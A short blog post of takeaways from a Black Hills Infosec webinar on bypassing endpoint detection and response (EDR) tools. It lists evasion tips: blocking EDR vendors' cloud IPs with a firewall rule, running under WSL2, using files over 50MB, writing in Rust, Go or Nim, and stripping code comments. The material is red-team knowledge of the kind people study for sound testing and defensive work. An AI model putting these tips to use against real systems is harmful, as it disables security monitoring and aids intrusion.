February 11

Webinar Takeaway: Black Hills Infosec: Sacred Cash Cow Tipping 2021

0  comments

file

My key takeaways

  • EDR loader: may execute shellcode
  • Most EDR are on cloud
    • Receipe to pwn such EDR:
      • get IP’s for the vendors (usually whitelisted)
      • create a windows firewall rule to block these IPs
      • EDR pwnd
  • EDRs are blind to WSL(2) since 2018
  • Files >50MB are usually ignored by EDRs
  • Rust, GoLang, Nim to bypass EDR
  • A lot of maleware ist still written in Delphi
  • EDR look for comments in code
    • no comments, no cry

Env


Tags

EDR, webinar takeaway


You may also like

Webinar Takeaway: How to Get Started in Cyber Threat Hunting

Webinar Takeaway: How to Get Started in Cyber Threat Hunting

Webinar Takeaway: How to Build a Phishing Engagement – Coding TTP´s

Webinar Takeaway: How to Build a Phishing Engagement – Coding TTP´s
Leave a Reply

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit markiert.

{"email":"Email address invalid","url":"Website address invalid","required":"Required field missing"}